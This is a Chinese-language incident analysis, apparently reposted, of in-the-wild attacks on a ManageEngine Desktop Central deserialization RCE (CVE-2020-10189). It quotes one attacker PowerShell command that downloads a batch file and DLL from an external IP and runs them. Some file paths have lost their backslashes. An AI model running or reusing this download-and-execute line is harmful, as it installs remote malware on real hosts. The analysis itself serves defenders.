Desktop Central服务器RCE漏洞在野攻击解析

发布时间：2022-08-04 10:11:04 所属栏目：安全来源：互联网

导读：在研究Desktop Central漏洞的过程中，我们在推特上找到了一位研究人员的帖子，该研究人员于2020年3月5日披露了Desktop Central的RCE漏洞。 Zoho ManageEngine Desktop Central 10允许远程执行代码，漏洞成因是FileStorage类的getChartImage中的不可信数据反

　　在研究Desktop Central漏洞的过程中，我们在推特上找到了一位研究人员的帖子，该研究人员于2020年3月5日披露了Desktop Central的RCE漏洞。

　　Zoho ManageEngine Desktop Central 10允许远程执行代码，漏洞成因是FileStorage类的getChartImage中的不可信数据反序列化，此漏洞和CewolfServlet，MDMLogUploaderServlet Servlet有关。

　　在公网发现的威胁是有可疑的PowerShell下载通讯录，该通讯录包含下载文件的说明。

　　最早威胁活动之一是一些可疑的PowerShell下载命令。该命令包含指令，以下载install.bat并storesyncsvc.dll到C:WindowsTemp，然后立即执行install.bat。

　　cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:WindowsTempinstall.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:WindowsTempstoresyncsvc.dll')&C:WindowsTempinstall.bat
　　esktop Central服务器RCE漏洞在野攻击分析

　　该install.bat脚本包含storesyncsvc.dll作为服务安装在系统上的说明。

　　回顾Sysmon流程创建事件，表明C:ManageEngineDesktopCentral_Serverjrebinjava.exe流程是负责执行PowerShell Download命令的流程。

　　为了进一步验证我们的理论，我们将从受影响的Desktop Central服务器收集的信息与已发布的POC进行了比较，确定攻击者可能利用了CVE-2020-10189漏洞在此易受攻击的系统上运行代码。

（编辑：云计算网_泰州站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!

促进网络安全科普共筑	开源软件安全度走向成
首席信息安全官依然会	如何创建有弹性的网络